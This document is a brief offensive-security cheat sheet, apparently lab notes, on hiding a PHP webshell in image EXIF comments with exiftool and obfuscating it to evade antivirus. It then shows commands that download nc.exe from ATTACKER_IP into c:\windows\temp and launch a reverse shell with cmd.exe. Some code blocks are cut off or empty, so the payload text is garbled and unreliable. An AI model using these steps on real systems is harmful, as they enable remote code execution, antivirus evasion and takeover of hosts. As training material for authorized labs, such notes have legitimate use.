# PHP Payload in Image ExifData * Test ```sh exiftool -Comment="Test Payload\"; die(); ?>" test-USERNAME.jpeg.php ``` * Build Payload with AV evasion ```sh " . shell_exec($cmd) . ""; } die(); ?> ``` * [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator) * Obfuscated code with escaped `$` ```sh ``` * Upload and execute commands with get parameter `?wreath=systeminfo` ## Uploading Reverse through Webshell * Parameter for Webshell ```sh curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe ``` * Trigger uploaded netcat ```sh powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe ```